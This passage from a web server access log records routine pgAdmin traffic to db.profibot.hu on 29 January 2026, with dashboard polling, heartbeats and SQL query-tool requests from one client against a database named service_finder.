(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:52:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:52:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:53:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:53:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:54:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:54:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:55:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:55:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:56:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:56:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:56:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:57:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:57:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:32 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:32 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:32 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:34 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:36 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:37 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:38 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 137] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 310] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:38 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:40 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:58:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:58:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:59:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:00:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:00:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:29 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:29 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:29 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:01:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:02:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:03:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:03:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:03:06 +0000] - 